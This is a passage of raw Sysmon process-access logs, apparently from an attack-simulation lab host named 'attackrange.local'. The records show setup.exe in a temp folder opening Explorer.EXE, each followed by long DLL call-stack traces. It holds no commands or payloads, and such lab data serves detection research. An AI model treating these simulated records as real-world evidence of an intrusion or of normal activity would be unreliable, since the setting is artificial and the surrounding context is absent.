9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000016049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.880{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 